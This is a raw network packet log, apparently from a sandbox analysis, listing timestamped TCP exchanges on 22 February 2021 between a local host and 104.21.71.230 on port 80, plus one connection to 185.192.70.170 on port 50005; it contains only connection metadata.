                                                                                                                                                                Feb 22, 2021 07:45:55.602247000 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.633304119 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.633351088 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.633374929 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.633430004 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.633456945 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.633481979 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.633481026 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.633502007 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.633641005 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.633666992 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.633690119 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.633713961 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.633728981 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.633733034 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.633744955 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.633775949 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.633835077 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.634613037 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.634641886 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.634717941 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.634727001 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.662848949 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.662885904 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.662909985 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.662934065 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.662957907 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.662957907 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.662986994 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.663013935 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.663036108 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.663044930 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.663049936 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.663062096 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.663276911 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.663898945 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.663929939 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.663953066 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.663975954 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.663997889 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.664016008 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.664027929 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.664664030 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.664695024 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.664715052 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.664757967 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.664767027 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.696006060 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.696043015 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.696065903 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.696088076 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.696110964 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.696115971 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.696134090 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.696158886 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.696165085 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.696183920 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.696206093 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.696393013 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.697037935 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.697072029 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.697093964 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.697115898 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.697140932 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.697165012 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.697187901 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.697199106 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.697304010 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.697988033 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.698019981 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.698033094 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.698045015 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.698122978 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.698129892 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.729235888 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.729274035 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.729300022 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.729324102 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.729346037 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.729374886 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.729376078 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.729399920 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.729485035 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.729566097 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.729592085 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.729625940 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.729649067 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.729676962 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.729701042 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.729722977 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.729732990 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.729800940 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.730560064 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.730588913 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.730613947 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.730634928 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.730658054 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.730685949 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.730685949 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.730690956 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.730751991 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.731488943 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.731523991 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.731550932 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.731575012 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.731637955 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.731646061 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.758852959 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.758887053 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.758912086 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.758939028 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.758961916 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.758991957 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.759074926 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.759095907 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.759222984 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.759248972 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.759272099 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.759295940 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.759315014 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.759361982 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.759371996 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.759943962 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.759973049 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.759995937 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.760019064 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.760041952 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.760067940 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.760080099 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.760088921 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.760139942 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.760989904 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.761019945 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.761039019 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.761055946 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.761073112 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.761094093 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.761883974 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.761905909 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.761967897 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.761979103 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.792457104 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.792500019 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.792527914 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.792552948 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.792578936 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.792607069 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.792654991 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.792674065 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.792825937 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.792859077 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.792882919 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.792907000 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.792931080 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.792941093 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.792944908 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.792958975 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.793757915 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.793807983 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.793840885 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.793865919 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.793891907 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.793915033 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.793941975 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.793988943 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.793998957 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.794758081 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.794796944 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.794823885 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.794852018 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.794855118 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.794874907 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.794898033 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.794903040 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.795072079 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.795725107 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.795761108 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.795784950 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.795794964 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.795938015 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.825515032 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.825552940 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.825576067 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.825601101 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.825608969 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.825627089 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.825649977 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.825651884 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.825895071 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.825921059 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.825948000 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.825973034 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.825973988 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.825979948 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.825994968 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.826015949 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.826055050 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.826061010 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.826875925 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.826906919 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.826930046 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.826951981 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.826977015 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.826989889 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.826996088 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.827003956 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.827819109 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.827847004 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.827869892 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.827892065 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.827905893 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.827910900 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.827915907 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.827943087 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.827991009 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.827999115 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.828797102 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.828825951 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.828850031 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.828871965 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.828913927 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.828921080 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.856808901 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.856849909 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.856880903 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.856908083 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.856933117 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.856960058 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.856991053 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.857013941 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.857171059 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.857184887 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.857203007 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.857228994 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.857253075 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.857285976 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.857317924 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.857331991 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.857335091 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.857424974 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.858156919 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.858186960 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.858212948 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.858237982 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.858268976 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.858299971 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.858349085 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.858398914 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.859106064 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.859138012 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.859165907 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.859189034 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.859216928 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.859245062 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.859258890 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.859267950 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.859937906 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.860040903 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.860060930 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.860078096 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.860095024 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.860110044 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.860153913 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.860158920 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.889746904 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.889775991 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.889791965 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.889807940 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.889823914 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.889844894 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.889862061 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.889883041 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.890120029 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.890137911 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.890175104 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:55.890181065 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:56.179095984 CET4972450005192.168.2.5185.192.70.170
                                                                                                                                                                Feb 22, 2021 07:45:56.220799923 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:56.220829010 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:56.220844984 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:56.220953941 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:56.549459934 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:56.549491882 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:56.549509048 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:56.549571037 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:56.888349056 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:56.888384104 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:56.888402939 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:56.888462067 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:57.227760077 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:57.227804899 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:57.227826118 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:57.227957010 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:57.566462040 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:57.566520929 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:57.566541910 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:57.566586971 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:57.615137100 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:58.495435953 CET8049723104.21.71.230192.168.2.5
